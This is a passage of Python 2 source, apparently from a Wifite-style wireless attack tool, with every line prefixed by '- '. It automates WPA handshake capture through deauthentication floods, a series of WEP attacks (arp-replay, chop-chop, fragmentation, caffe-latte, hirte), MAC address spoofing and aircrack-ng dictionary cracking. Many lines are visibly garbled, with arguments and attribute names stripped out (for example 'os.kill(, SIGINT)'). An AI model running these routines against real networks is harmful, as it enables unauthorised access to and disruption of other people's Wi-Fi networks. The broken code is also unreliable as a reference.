- if len(targets) == 0 or not os.path.exists(cap_file): return
- if verbose:
- print GR+' [+]'+W+' checking for '+G+'WPS compatibility'+W+'...',
- stdout.flush()
- cmd = [program_name,
- '-f', cap_file,
- '-C'] # ignore Frame Check Sum errors
- proc_walsh = Popen(cmd, stdout=PIPE, stderr=DN)
- proc_walsh.wait()
- for line in proc_walsh.communicate()[0].split('\n'):
- if line.strip() == '' or line.startswith('Scanning for'): continue
- bssid = line.split(' ')[0]
- for t in targets:
- if t.bssid.lower() == bssid.lower():
- t.wps = True
- if verbose:
- print 'done'
- removed = 0
- i = 0
- while i < len(targets):
- if not targets[i].wps and targets[i].encryption.find('WPA') != -1:
- removed += 1
- targets.pop(i)
- else: i += 1
- if removed > 0 and verbose: print GR+' [+]'+O+' removed %d non-WPS-enabled targets%s' % (removed, W)
- def print_and_exec(cmd):
- """
- Prints and executes command "cmd". Also waits half a second
- Used by rtl8187_fix (for prettiness)
- """
- print '\r \r',
- stdout.flush()
- print O+' [!] '+W+'executing: '+O+' '.join(cmd) + W,
- stdout.flush()
- call(cmd, stdout=DN, stderr=DN)
- time.sleep(0.1)
- ####################
- ####################
- def remove_airodump_files(prefix):
- """
- Removes airodump output files for whatever file prefix ('wpa', 'wep', etc)
- Used by wpa_get_handshake() and attack_wep()
- """
- global RUN_CONFIG
- remove_file(prefix + '-01.cap')
- remove_file(prefix + '-01.csv')
- remove_file(prefix + '-01.kismet.csv')
- remove_file(prefix + '-01.kismet.netxml')
- for filename in os.listdir(RUN_CONFIG.temp):
- if filename.lower().endswith('.xor'): remove_file(RUN_CONFIG.temp + filename)
- for filename in os.listdir('.'):
- if filename.startswith('replay_') and filename.endswith('.cap'):
- remove_file(filename)
- if filename.endswith('.xor'): remove_file(filename)
- # Remove .cap's from previous attack sessions
- """i = 2
- while os.path.exists(temp + 'wep-' + str(i) + '.cap'):
- os.remove(temp + 'wep-' + str(i) + '.cap')
- i += 1
- """
- def remove_file(filename):
- """
- Attempts to remove a file. Does not throw error if file is not found.
- """
- try: os.remove(filename)
- except OSError: pass
- def program_exists(program):
- """
- Uses 'which' (linux command) to check if a program is installed.
- """
- proc = Popen(['which', program], stdout=PIPE, stderr=PIPE)
- txt = proc.communicate()
- if txt[0].strip() == '' and txt[1].strip() == '':
- return False
- if txt[0].strip() != '' and txt[1].strip() == '':
- return True
- return not (txt[1].strip() == '' or txt[1].find('no %s in' % program) != -1)
- def sec_to_hms(sec):
- """
- Converts integer sec to h:mm:ss format
- """
- if sec <= -1: return '[endless]'
- h = sec / 3600
- sec %= 3600
- m = sec / 60
- sec %= 60
- return '[%d:%02d:%02d]' % (h, m, sec)
- def send_interrupt(process):
- """
- Sends interrupt signal to process's PID.
- """
- try:
- os.kill(, SIGINT)
- # os.kill(, SIGTERM)
- except OSError: pass # process cannot be killed
- except TypeError: pass # pid is incorrect type
- except UnboundLocalError: pass # 'process' is not defined
- except AttributeError: pass # Trying to kill "None"
- def get_mac_address(iface):
- """
- Returns MAC address of "iface".
- """
- proc = Popen(['ifconfig', iface], stdout=PIPE, stderr=DN)
- proc.wait()
- mac = ''
- first_line = proc.communicate()[0].split('\n')[0]
- for word in first_line.split(' '):
- if word != '': mac = word
- if mac.find('-') != -1: mac = mac.replace('-', ':')
- if len(mac) > 17: mac = mac[0:17]
- return mac
- def generate_random_mac(old_mac):
- """
- Generates a random MAC address.
- Keeps the same vender (first 6 chars) of the old MAC address (old_mac).
- Returns string in format old_mac[0:9] + :XX:XX:XX where X is random hex
- """
- random.seed()
- new_mac = old_mac[:8].lower().replace('-', ':')
- for i in xrange(0, 6):
- if i % 2 == 0: new_mac += ':'
- new_mac += '0123456789abcdef'[random.randint(0,15)]
- # Prevent generating the same MAC address via recursion.
- if new_mac == old_mac:
- new_mac = generate_random_mac(old_mac)
- return new_mac
- def mac_anonymize(iface):
- """
- Changes MAC address of 'iface' to a random MAC.
- Only randomizes the last 6 digits of the MAC, so the vender says the same.
- Stores old MAC address and the interface in ORIGINAL_IFACE_MAC
- """
- global RUN_CONFIG
- if not program_exists('ifconfig'): return
- # Store old (current) MAC address
- proc = Popen(['ifconfig', iface], stdout=PIPE, stderr=DN)
- proc.wait()
- for word in proc.communicate()[0].split('\n')[0].split(' '):
- if word != '': old_mac = word
- RUN_CONFIG.ORIGINAL_IFACE_MAC = (iface, old_mac)
- new_mac = generate_random_mac(old_mac)
- call(['ifconfig', iface, 'down'])
- print GR+" [+]"+W+" changing %s's MAC from %s to %s..." % (G+iface+W, G+old_mac+W, O+new_mac+W),
- stdout.flush()
- proc = Popen(['ifconfig', iface, 'hw', 'ether', new_mac], stdout=PIPE, stderr=DN)
- proc.wait()
- call(['ifconfig', iface, 'up'], stdout=DN, stderr=DN)
- print 'done'
- def mac_change_back():
- """
- Changes MAC address back to what it was before attacks began.
- """
- global RUN_CONFIG
- if iface == '' or old_mac == '': return
- print GR+" [+]"+W+" changing %s's mac back to %s..." % (G+iface+W, G+old_mac+W),
- stdout.flush()
- call(['ifconfig', iface, 'down'], stdout=DN, stderr=DN)
- proc = Popen(['ifconfig', iface, 'hw', 'ether', old_mac], stdout=PIPE, stderr=DN)
- proc.wait()
- call(['ifconfig', iface, 'up'], stdout=DN, stderr=DN)
- print "done"
- def get_essid_from_cap(bssid, capfile):
- """
- Attempts to get ESSID from cap file using BSSID as reference.
- Returns '' if not found.
- """
- if not program_exists('tshark'): return ''
- cmd = ['tshark',
- '-r', capfile,
- '-R', 'wlan.fc.type_subtype == 0x05 && == %s' % bssid,
- '-n']
- proc = Popen(cmd, stdout=PIPE, stderr=DN)
- proc.wait()
- for line in proc.communicate()[0].split('\n'):
- if line.find('SSID=') != -1:
- essid = line[line.find('SSID=')+5:]
- print GR+' [+]'+W+' guessed essid: %s' % (G+essid+W)
- return essid
- print R+' [!]'+O+' unable to guess essid!'+W
- return ''
- def get_bssid_from_cap(essid, capfile):
- """
- Returns first BSSID of access point found in cap file.
- This is not accurate at all, but it's a good guess.
- Returns '' if not found.
- """
- global RUN_CONFIG
- if not program_exists('tshark'): return ''
- # Attempt to get BSSID based on ESSID
- if essid != '':
- cmd = ['tshark',
- '-r', capfile,
- '-R', 'wlan_mgt.ssid == "%s" && wlan.fc.type_subtype == 0x05' % (essid),
- '-n', # Do not resolve MAC vendor names
- '-T', 'fields', # Only display certain fields
- '-e', ''] # souce MAC address
- proc = Popen(cmd, stdout=PIPE, stderr=DN)
- proc.wait()
- bssid = proc.communicate()[0].split('\n')[0]
- if bssid != '': return bssid
- cmd = ['tshark',
- '-r', capfile,
- '-R', 'eapol',
- '-n']
- proc = Popen(cmd, stdout=PIPE, stderr=DN)
- proc.wait()
- for line in proc.communicate()[0].split('\n'):
- if line.endswith('Key (msg 1/4)') or line.endswith('Key (msg 3/4)'):
- while line.startswith(' ') or line.startswith('\t'): line = line[1:]
- line = line.replace('\t', ' ')
- while line.find(' ') != -1: line = line.replace(' ', ' ')
- return line.split(' ')[2]
- elif line.endswith('Key (msg 2/4)') or line.endswith('Key (msg 4/4)'):
- while line.startswith(' ') or line.startswith('\t'): line = line[1:]
- line = line.replace('\t', ' ')
- while line.find(' ') != -1: line = line.replace(' ', ' ')
- return line.split(' ')[4]
- return ''
- def attack_interrupted_prompt():
- """
- Promps user to decide if they want to exit,
- skip to cracking WPA handshakes,
- or continue attacking the remaining targets (if applicable).
- returns True if user chose to exit complete, False otherwise
- """
- global RUN_CONFIG
- should_we_exit = False
- # If there are more targets to attack, ask what to do next
- options = ''
- print GR+"\n [+] %s%d%s target%s remain%s" % (G, RUN_CONFIG.TARGETS_REMAINING, W,
- '' if RUN_CONFIG.TARGETS_REMAINING == 1 else 's',
- 's' if RUN_CONFIG.TARGETS_REMAINING == 1 else '')
- print GR+" [+]"+W+" what do you want to do?"
- options += G+'c'+W
- print G+" [c]ontinue"+W+" attacking targets"
- options += W+', '+O+'s'+W
- print O+" [s]kip"+W+" to cracking WPA cap files"
- options += W+', or '+R+'e'+W
- print R+" [e]xit"+W+" completely"
- ri = ''
- while ri != 'c' and ri != 's' and ri != 'e':
- ri = raw_input(GR+' [+]'+W+' please make a selection (%s): ' % options)
- if ri == 's':
- RUN_CONFIG.TARGETS_REMAINING = -1 # Tells start() to ignore other targets, skip to cracking
- elif ri == 'e':
- should_we_exit = True
- return should_we_exit
- #
- # Abstract base class for attacks.
- # Attacks are required to implement the following methods:
- # RunAttack - Initializes the attack
- # EndAttack - Cleanly ends the attack
- #
- class Attack(object):
- __metaclass__ = abc.ABCMeta
- @abc.abstractmethod
- def RunAttack(self):
- raise NotImplementedError()
- @abc.abstractmethod
- def EndAttack(self):
- raise NotImplementedError()
- #################
- #################
- class WPAAttack(Attack):
- def __init__(self, iface, target, clients, config):
- self.iface = iface
- self.clients = clients
- = target
- self.RUN_CONFIG = config
- def RunAttack(self):
- '''
- Abstract method for initializing the WPA attack
- '''
- self.wpa_get_handshake()
- def EndAttack(self):
- '''
- Abstract method for ending the WPA attack
- '''
- pass
- def wpa_get_handshake(self):
- """
- Opens an airodump capture on the target, dumping to a file.
- During the capture, sends deauthentication packets to the target both as
- general deauthentication packets and specific packets aimed at connected clients.
- Waits until a handshake is captured.
- "iface" - interface to capture on
- "target" - Target object containing info on access point
- "clients" - List of Client objects associated with the target
- Returns True if handshake was found, False otherwise
- """
- # Generate the filename to save the .cap file as <SSID>_aa-bb-cc-dd-ee-ff.cap
- save_as = self.RUN_CONFIG.WPA_HANDSHAKE_DIR + os.sep + re.sub(r'[^a-zA-Z0-9]', '', \
- + '_' +':', '-') + '.cap'
- # Check if we already have a handshake for this SSID... If we do, generate a new filename
- save_index = 0
- while os.path.exists(save_as):
- save_index += 1
- save_as = self.RUN_CONFIG.WPA_HANDSHAKE_DIR + os.sep + re.sub(r'[^a-zA-Z0-9]', '', \
- + '_' +':', '-') \
- + '_' + str(save_index) + '.cap'
- # Remove previous airodump output files (if needed)
- remove_airodump_files(self.RUN_CONFIG.temp + 'wpa')
- # Start of large Try-Except; used for catching keyboard interrupt (Ctrl+C)
- try:
- # Start airodump-ng process to capture handshakes
- cmd = ['airodump-ng',
- '-w', self.RUN_CONFIG.temp + 'wpa',
- '-c',,
- '--bssid',, self.iface]
- proc_read = Popen(cmd, stdout=DN, stderr=DN)
- # Setting deauthentication process here to avoid errors later on
- proc_deauth = None
- print ' %s starting %swpa handshake capture%s on "%s"' % \
- (GR+sec_to_hms(self.RUN_CONFIG.WPA_ATTACK_TIMEOUT)+W, G, W,
- got_handshake = False
- seconds_running = 0
- target_clients = self.clients[:]
- client_index = -1
- start_time = time.time()
- # Deauth and check-for-handshake loop
- while not got_handshake and (self.RUN_CONFIG.WPA_ATTACK_TIMEOUT <= 0 or seconds_running < self.RUN_CONFIG.WPA_ATTACK_TIMEOUT):
- if proc_read.poll() != None:
- print ""
- print "airodump-ng exited with status " + str(proc_read.poll())
- print ""
- break
- time.sleep(1)
- seconds_running = int(time.time() - start_time)
- print " \r",
- print ' %s listening for handshake...\r' % \
- (GR+sec_to_hms(self.RUN_CONFIG.WPA_ATTACK_TIMEOUT - seconds_running)+W),
- stdout.flush()
- if seconds_running % self.RUN_CONFIG.WPA_DEAUTH_TIMEOUT == 0:
- # Send deauth packets via aireplay-ng
- cmd = ['aireplay-ng',
- '--ignore-negative-one',
- '-0', # Attack method (Deauthentication)
- str(self.RUN_CONFIG.WPA_DEAUTH_COUNT), # Number of packets to send
- '-a',]
- client_index += 1
- if client_index == -1 or len(target_clients) == 0 or client_index >= len(target_clients):
- print " %s sending %s deauth to %s*broadcast*%s..." % \
- (GR+sec_to_hms(self.RUN_CONFIG.WPA_ATTACK_TIMEOUT - seconds_running)+W, G+str(self.RUN_CONFIG.WPA_DEAUTH_COUNT)+W, G, W),
- client_index = -1
- else:
- print " %s sending %s deauth to %s... " % \
- (GR+sec_to_hms(self.RUN_CONFIG.WPA_ATTACK_TIMEOUT - seconds_running)+W, \
- G+target_clients[client_index].bssid+W),
- cmd.append('-h')
- cmd.append(target_clients[client_index].bssid)
- cmd.append(self.iface)
- stdout.flush()
- # Send deauth packets via aireplay, wait for them to complete.
- proc_deauth = Popen(cmd, stdout=DN, stderr=DN)
- proc_deauth.wait()
- print "sent\r",
- stdout.flush()
- # Copy current dump file for consistency
- if not os.path.exists(self.RUN_CONFIG.temp + 'wpa-01.cap'): continue
- copy(self.RUN_CONFIG.temp + 'wpa-01.cap', self.RUN_CONFIG.temp + 'wpa-01.cap.temp')
- # Save copy of cap file (for debugging)
- #remove_file('/root/new/wpa-01.cap')
- #copy(temp + 'wpa-01.cap', '/root/new/wpa-01.cap')
- # Check for handshake
- if self.has_handshake(, self.RUN_CONFIG.temp + 'wpa-01.cap.temp'):
- got_handshake = True
- try: os.mkdir(self.RUN_CONFIG.WPA_HANDSHAKE_DIR + os.sep)
- except OSError: pass
- # Kill the airodump and aireplay processes
- send_interrupt(proc_read)
- send_interrupt(proc_deauth)
- # Save a copy of the handshake
- rename(self.RUN_CONFIG.temp + 'wpa-01.cap.temp', save_as)
- print '\n %s %shandshake captured%s! saved as "%s"' % (GR+sec_to_hms(seconds_running)+W, G, W, G+save_as+W)
- self.RUN_CONFIG.WPA_FINDINGS.append('%s (%s) handshake captured' % (,
- self.RUN_CONFIG.WPA_FINDINGS.append('saved as %s' % (save_as))
- self.RUN_CONFIG.WPA_FINDINGS.append('')
- # Strip handshake if needed
- if self.RUN_CONFIG.WPA_STRIP_HANDSHAKE: self.strip_handshake(save_as)
- # Add the filename and SSID to the list of 'to-crack'
- # Cracking will be handled after all attacks are finished.
- self.RUN_CONFIG.WPA_CAPS_TO_CRACK.append(CapFile(save_as,,
- break # Break out of while loop
- # No handshake yet
- os.remove(self.RUN_CONFIG.temp + 'wpa-01.cap.temp')
- # Check the airodump output file for new clients
- for client in self.RUN_CONFIG.RUN_ENGINE.parse_csv(self.RUN_CONFIG.temp + 'wpa-01.csv')[1]:
- if client.station != continue
- new_client = True
- for c in target_clients:
- if client.bssid == c.bssid:
- new_client = False
- break
- if new_client:
- print " %s %snew client%s found: %s " % \
- (GR+sec_to_hms(self.RUN_CONFIG.WPA_ATTACK_TIMEOUT - seconds_running)+W, G, W, \
- G+client.bssid+W)
- target_clients.append(client)
- # End of Handshake wait loop.
- if not got_handshake:
- print R+' [0:00:00]'+O+' unable to capture handshake in time'+W
- except KeyboardInterrupt:
- print R+'\n (^C)'+O+' WPA handshake capture interrupted'+W
- if attack_interrupted_prompt():
- remove_airodump_files(self.RUN_CONFIG.temp + 'wpa')
- send_interrupt(proc_read)
- send_interrupt(proc_deauth)
- print ''
- self.RUN_CONFIG.exit_gracefully(0)
- # clean up
- remove_airodump_files(self.RUN_CONFIG.temp + 'wpa')
- send_interrupt(proc_read)
- send_interrupt(proc_deauth)
- return got_handshake
- def has_handshake_tshark(self, target, capfile):
- """
- Uses TShark to check for a handshake.
- Returns "True" if handshake is found, false otherwise.
- """
- if program_exists('tshark'):
- # Call Tshark to return list of EAPOL packets in cap file.
- cmd = ['tshark',
- '-r', capfile, # Input file
- '-R', 'eapol', # Filter (only EAPOL packets)
- '-n'] # Do not resolve names (MAC vendors)
- proc = Popen(cmd, stdout=PIPE, stderr=DN)
- proc.wait()
- lines = proc.communicate()[0].split('\n')
- # Get list of all clients in cap file
- clients = []
- for line in lines:
- if line.find('appears to have been cut short') != -1 or line.find('Running as user "root"') != -1 or line.strip() == '':
- continue
- while line.startswith(' '): line = line[1:]
- while line.find(' ') != -1: line = line.replace(' ', ' ')
- fields = line.split(' ')
- # ensure tshark dumped correct info
- if len(fields) < 5:
- continue
- src = fields[2].lower()
- dst = fields[4].lower()
- if src == target.bssid.lower() and clients.count(dst) == 0: clients.append(dst)
- elif dst == target.bssid.lower() and clients.count(src) == 0: clients.append(src)
- # Check each client for a handshake
- for client in clients:
- msg_num = 1 # Index of message in 4-way handshake (starts at 1)
- for line in lines:
- if line.find('appears to have been cut short') != -1: continue
- if line.find('Running as user "root"') != -1: continue
- if line.strip() == '': continue
- # Sanitize tshark's output, separate into fields
- while line[0] == ' ': line = line[1:]
- while line.find(' ') != -1: line = line.replace(' ', ' ')
- fields = line.split(' ')
- # Sometimes tshark doesn't display the full header for "Key (msg 3/4)" on the 3rd handshake.
- # This catches this glitch and fixes it.
- if len(fields) < 8:
- continue
- elif len(fields) == 8:
- fields.append('(msg')
- fields.append('3/4)')
- src = fields[2].lower() # Source MAC address
- dst = fields[4].lower() # Destination MAC address
- #msg = fields[9][0] # The message number (1, 2, 3, or 4)
- msg = fields[-1][0]
- # First, third msgs in 4-way handshake are from the target to client
- if msg_num % 2 == 1 and (src != target.bssid.lower() or dst != client): continue
- # Second, fourth msgs in 4-way handshake are from client to target
- elif msg_num % 2 == 0 and (dst != target.bssid.lower() or src != client): continue
- # The messages must appear in sequential order.
- try:
- if int(msg) != msg_num: continue
- except ValueError: continue
- msg_num += 1
- # We need the first 4 messages of the 4-way handshake
- # Although aircrack-ng cracks just fine with only 3 of the messages...
- if msg_num >= 4:
- return True
- return False
- def has_handshake_cowpatty(self, target, capfile, nonstrict=True):
- """
- Uses cowpatty to check for a handshake.
- Returns "True" if handshake is found, false otherwise.
- """
- if not program_exists('cowpatty'): return False
- # Call cowpatty to check if capfile contains a valid handshake.
- cmd = ['cowpatty',
- '-r', capfile, # input file
- '-s', target.ssid, # SSID
- '-c'] # Check for handshake
- # Uses frames 1, 2, or 3 for key attack
- if nonstrict: cmd.append('-2')
- proc = Popen(cmd, stdout=PIPE, stderr=DN)
- proc.wait()
- response = proc.communicate()[0]
- if response.find('incomplete four-way handshake exchange') != -1:
- return False
- elif response.find('Unsupported or unrecognized pcap file.') != -1:
- return False
- elif response.find('Unable to open capture file: Success') != -1:
- return False
- return True
- def has_handshake_pyrit(self, target, capfile):
- """
- Uses pyrit to check for a handshake.
- Returns "True" if handshake is found, false otherwise.
- """
- if not program_exists('pyrit'): return False
- # Call pyrit to "Analyze" the cap file's handshakes.
- cmd = ['pyrit',
- '-r', capfile,
- 'analyze']
- proc = Popen(cmd, stdout=PIPE, stderr=DN)
- proc.wait()
- hit_essid = False
- for line in proc.communicate()[0].split('\n'):
- # Iterate over every line of output by Pyrit
- if line == '' or line == None: continue
- if line.find("AccessPoint") != -1:
- hit_essid = (line.find("('" + target.ssid + "')") != -1) and \
- (line.lower().find(target.bssid.lower()) != -1)
- #hit_essid = (line.lower().find(target.bssid.lower()))
- else:
- # If Pyrit says it's good or workable, it's a valid handshake.
- if hit_essid and (line.find(', good, ') != -1 or \
- line.find(', workable, ') != -1):
- return True
- return False
- def has_handshake_aircrack(self, target, capfile):
- """
- Uses aircrack-ng to check for handshake.
- Returns True if found, False otherwise.
- """
- if not program_exists('aircrack-ng'): return False
- crack = 'echo "" | aircrack-ng -a 2 -w - -b ' + target.bssid + ' ' + capfile
- proc_crack = Popen(crack, stdout=PIPE, stderr=DN, shell=True)
- proc_crack.wait()
- txt = proc_crack.communicate()[0]
- return (txt.find('Passphrase not in dictionary') != -1)
- def has_handshake(self, target, capfile):
- """
- Checks if .cap file contains a handshake.
- Returns True if handshake is found, False otherwise.
- """
- valid_handshake = True
- tried = False
- tried = True
- valid_handshake = self.has_handshake_tshark(target, capfile)
- if valid_handshake and self.RUN_CONFIG.WPA_HANDSHAKE_COWPATTY:
- tried = True
- valid_handshake = self.has_handshake_cowpatty(target, capfile)
- # Use CowPatty to check for handshake.
- if valid_handshake and self.RUN_CONFIG.WPA_HANDSHAKE_COWPATTY:
- tried = True
- valid_handshake = self.has_handshake_cowpatty(target, capfile)
- # Check for handshake using Pyrit if applicable
- if valid_handshake and self.RUN_CONFIG.WPA_HANDSHAKE_PYRIT:
- tried = True
- valid_handshake = self.has_handshake_pyrit(target, capfile)
- # Check for handshake using aircrack-ng
- if valid_handshake and self.RUN_CONFIG.WPA_HANDSHAKE_AIRCRACK:
- tried = True
- valid_handshake = self.has_handshake_aircrack(target, capfile)
- if tried: return valid_handshake
- print R+' [!]'+O+' unable to check for handshake: all handshake options are disabled!'
- self.RUN_CONFIG.exit_gracefully(1)
- def strip_handshake(self, capfile):
- """
- Uses Tshark or Pyrit to strip all non-handshake packets from a .cap file
- File in location 'capfile' is overwritten!
- """
- output_file = capfile
- if program_exists('pyrit'):
- cmd = ['pyrit',
- '-r', capfile,
- '-o', output_file,
- 'strip']
- call(cmd,stdout=DN, stderr=DN)
- elif program_exists('tshark'):
- # strip results with tshark
- cmd = ['tshark',
- '-r', capfile, # input file
- '-R', 'eapol || wlan_mgt.tag.interpretation', # filter
- '-w', capfile + '.temp'] # output file
- proc_strip = call(cmd, stdout=DN, stderr=DN)
- rename(capfile + '.temp', output_file)
- else:
- print R+" [!]"+O+" unable to strip .cap file: neither pyrit nor tshark were found"+W
- ##########################
- ##########################
- def wpa_crack(capfile, RUN_CONFIG):
- """
- Cracks cap file using aircrack-ng
- This is crude and slow. If people want to crack using pyrit or cowpatty or oclhashcat,
- they can do so manually.
- """
- print R+' [!]'+O+' no WPA dictionary found! use -dict <file> command-line argument'+W
- return False
- print GR+' [0:00:00]'+W+' cracking %s with %s' % (G+capfile.ssid+W, G+'aircrack-ng'+W)
- start_time = time.time()
- cracked = False
- remove_file(RUN_CONFIG.temp + 'out.out')
- remove_file(RUN_CONFIG.temp + 'wpakey.txt')
- cmd = ['aircrack-ng',
- '-a', '2', # WPA crack
- '-l', RUN_CONFIG.temp + 'wpakey.txt', # Save key to file
- '-b', capfile.bssid, # BSSID of target
- capfile.filename]
- proc = Popen(cmd, stdout=open(RUN_CONFIG.temp + 'out.out', 'a'), stderr=DN)
- try:
- kt = 0 # Keys tested
- kps = 0 # Keys per second
- while True:
- time.sleep(1)
- if proc.poll() != None: # aircrack stopped
- if os.path.exists(RUN_CONFIG.temp + 'wpakey.txt'):
- # Cracked
- inf = open(RUN_CONFIG.temp + 'wpakey.txt')
- key =
- inf.close()
- RUN_CONFIG.WPA_FINDINGS.append('cracked wpa key for "%s" (%s): "%s"' % (G+capfile.ssid+W, G+capfile.bssid+W, C+key+W))
- t = Target(capfile.bssid, 0, 0, 0, 'WPA', capfile.ssid)
- t.key = key
- RUN_CONFIG.save_cracked(t)
- print GR+'\n [+]'+W+' cracked %s (%s)!' % (G+capfile.ssid+W, G+capfile.bssid+W)
- print GR+' [+]'+W+' key: "%s"\n' % (C+key+W)
- cracked = True
- else:
- # Did not crack
- print R+'\n [!]'+R+'crack attempt failed'+O+': passphrase not in dictionary'+W
- break
- inf = open(RUN_CONFIG.temp + 'out.out', 'r')
- lines ='\n')
- inf.close()
- outf = open(RUN_CONFIG.temp + 'out.out', 'w')
- outf.close()
- for line in lines:
- i = line.find(']')
- j = line.find('keys tested', i)
- if i != -1 and j != -1:
- kts = line[i+2:j-1]
- try: kt = int(kts)
- except ValueError: pass
- i = line.find('(')
- j = line.find('k/s)', i)
- if i != -1 and j != -1:
- kpss = line[i+1:j-1]
- try: kps = float(kpss)
- except ValueError: pass
- print "\r %s %s keys tested (%s%.2f keys/sec%s) " % \
- (GR+sec_to_hms(time.time() - start_time)+W, G+add_commas(kt)+W, G, kps, W),
- stdout.flush()
- except KeyboardInterrupt: print R+'\n (^C)'+O+' WPA cracking interrupted'+W
- send_interrupt(proc)
- try: os.kill(, SIGTERM)
- except OSError: pass
- return cracked
- def add_commas(n):
- """
- Receives integer n, returns string representation of n with commas in thousands place.
- I'm sure there's easier ways of doing this... but meh.
- """
- strn = str(n)
- lenn = len(strn)
- i = 0
- result = ''
- while i < lenn:
- if (lenn - i) % 3 == 0 and i != 0: result += ','
- result += strn[i]
- i += 1
- return result
- #################
- #################
- class WEPAttack(Attack):
- def __init__(self, iface, target, clients, config):
- self.iface = iface
- = target
- self.clients = clients
- self.RUN_CONFIG = config
- def RunAttack(self):
- '''
- Abstract method for dispatching the WEP crack
- '''
- self.attack_wep()
- def EndAttack(self):
- '''
- Abstract method for ending the WEP attack
- '''
- pass
- def attack_wep(self):
- """
- Attacks WEP-encrypted network.
- Returns True if key was successfully found, False otherwise.
- """
- total_attacks = 6 # 4 + (2 if len(clients) > 0 else 0)
- if not self.RUN_CONFIG.WEP_ARP_REPLAY: total_attacks -= 1
- if not self.RUN_CONFIG.WEP_CHOPCHOP: total_attacks -= 1
- if not self.RUN_CONFIG.WEP_FRAGMENT: total_attacks -= 1
- if not self.RUN_CONFIG.WEP_CAFFELATTE: total_attacks -= 1
- if not self.RUN_CONFIG.WEP_P0841: total_attacks -= 1
- if not self.RUN_CONFIG.WEP_HIRTE: total_attacks -= 1
- if total_attacks <= 0:
- print R+' [!]'+O+' unable to initiate WEP attacks: no attacks are selected!'
- return False
- remaining_attacks = total_attacks
- print ' %s preparing attack "%s" (%s)' % \
- (GR+sec_to_hms(self.RUN_CONFIG.WEP_TIMEOUT)+W,,
- remove_airodump_files(self.RUN_CONFIG.temp + 'wep')
- remove_file(self.RUN_CONFIG.temp + 'wepkey.txt')
- # Start airodump process to capture packets
- cmd_airodump = ['airodump-ng',
- '-w', self.RUN_CONFIG.temp + 'wep', # Output file name (wep-01.cap, wep-01.csv)
- '-c',, # Wireless channel
- '--bssid',,
- self.iface]
- proc_airodump = Popen(cmd_airodump, stdout=DN, stderr=DN)
- proc_aireplay = None
- proc_aircrack = None
- successful = False # Flag for when attack is successful
- started_cracking = False # Flag for when we have started aircrack-ng
- client_mac = '' # The client mac we will send packets to/from
- total_ivs = 0
- ivs = 0
- last_ivs = 0
- for attack_num in xrange(0, 6):
- # Skip disabled attacks
- if attack_num == 0 and not self.RUN_CONFIG.WEP_ARP_REPLAY: continue
- elif attack_num == 1 and not self.RUN_CONFIG.WEP_CHOPCHOP: continue
- elif attack_num == 2 and not self.RUN_CONFIG.WEP_FRAGMENT: continue
- elif attack_num == 3 and not self.RUN_CONFIG.WEP_CAFFELATTE: continue
- elif attack_num == 4 and not self.RUN_CONFIG.WEP_P0841: continue
- elif attack_num == 5 and not self.RUN_CONFIG.WEP_HIRTE: continue
- remaining_attacks -= 1
- try:
- if self.wep_fake_auth(self.iface,, sec_to_hms(self.RUN_CONFIG.WEP_TIMEOUT)):
- # Successful fake auth
- client_mac = self.RUN_CONFIG.THIS_MAC
- send_interrupt(proc_aireplay)
- send_interrupt(proc_airodump)
- print R+' [!]'+O+' unable to fake-authenticate with target'
- print R+' [!]'+O+' to skip this speed bump, select "ignore-fake-auth" at command-line'
- return False
- remove_file(self.RUN_CONFIG.temp + 'arp.cap')
- # Generate the aireplay-ng arguments based on attack_num and other params
- cmd = self.get_aireplay_command(self.iface, attack_num,, self.clients, client_mac)
- if cmd == '': continue
- if proc_aireplay != None:
- send_interrupt(proc_aireplay)
- proc_aireplay = Popen(cmd, stdout=DN, stderr=DN)
- print '\r %s attacking "%s" via' % (GR+sec_to_hms(self.RUN_CONFIG.WEP_TIMEOUT)+W,,
- if attack_num == 0: print G+'arp-replay',
- elif attack_num == 1: print G+'chop-chop',
- elif attack_num == 2: print G+'fragmentation',
- elif attack_num == 3: print G+'caffe-latte',
- elif attack_num == 4: print G+'p0841',
- elif attack_num == 5: print G+'hirte',
- print 'attack'+W
- print ' %s captured %s%d%s ivs @ %s iv/sec' % (GR+sec_to_hms(self.RUN_CONFIG.WEP_TIMEOUT)+W, G, total_ivs, W, G+'0'+W),
- stdout.flush()
- time.sleep(1)
- if attack_num == 1:
- # Send a deauth packet to broadcast and all clients *just because!*
- self.wep_send_deauths(self.iface,, self.clients)
- last_deauth = time.time()
- replaying = False
- time_started = time.time()
- while time.time() - time_started < self.RUN_CONFIG.WEP_TIMEOUT:
- # time.sleep(5)
- for time_count in xrange(0, 6):
- if self.RUN_CONFIG.WEP_TIMEOUT == -1:
- current_hms = "[endless]"
- else:
- current_hms = sec_to_hms(self.RUN_CONFIG.WEP_TIMEOUT - (time.time() - time_started))
- print "\r %s\r" % (GR+current_hms+W),
- stdout.flush()
- time.sleep(1)
- # Calculates total seconds remaining
- # Check number of IVs captured
- csv = self.RUN_CONFIG.RUN_ENGINE.parse_csv(self.RUN_CONFIG.temp + 'wep-01.csv')[0]
- if len(csv) > 0:
- ivs = int(csv[0].data)
- print "\r ",
- print "\r %s captured %s%d%s ivs @ %s%d%s iv/sec" % \
- (GR+current_hms+W, G, total_ivs + ivs, W, G, (ivs - last_ivs) / 5, W),
- if ivs - last_ivs == 0 and time.time() - last_deauth > 30:
- print "\r %s deauthing to generate packets..." % (GR+current_hms+W),
- self.wep_send_deauths(self.iface,, self.clients)
- print "done\r",
- last_deauth = time.time()
- last_ivs = ivs
- stdout.flush()
- if total_ivs + ivs >= self.RUN_CONFIG.WEP_CRACK_AT_IVS and not started_cracking:
- # Start cracking
- cmd = ['aircrack-ng',
- '-a', '1',
- '-l', self.RUN_CONFIG.temp + 'wepkey.txt']
- #temp + 'wep-01.cap']
- # Append all .cap files in temp directory (in case we are resuming)
- for f in os.listdir(self.RUN_CONFIG.temp):
- if f.startswith('wep-') and f.endswith('.cap'):
- cmd.append(self.RUN_CONFIG.temp + f)
- print "\r %s started %s (%sover %d ivs%s)" % (GR+current_hms+W, G+'cracking'+W, G, self.RUN_CONFIG.WEP_CRACK_AT_IVS, W)
- proc_aircrack = Popen(cmd, stdout=DN, stderr=DN)
- started_cracking = True
- # Check if key has been cracked yet.
- if os.path.exists(self.RUN_CONFIG.temp + 'wepkey.txt'):
- # Cracked!
- infile = open(self.RUN_CONFIG.temp + 'wepkey.txt', 'r')
- key ='\n', '')
- infile.close()
- print '\n\n %s %s %s (%s)! key: "%s"' % (current_hms, G+'cracked',,, C+key+W)
- self.RUN_CONFIG.WEP_FINDINGS.append('cracked %s (%s), key: "%s"' % (,, key))
- self.RUN_CONFIG.WEP_FINDINGS.append('')
- t = Target(, 0, 0, 0, 'WEP',
- t.key = key
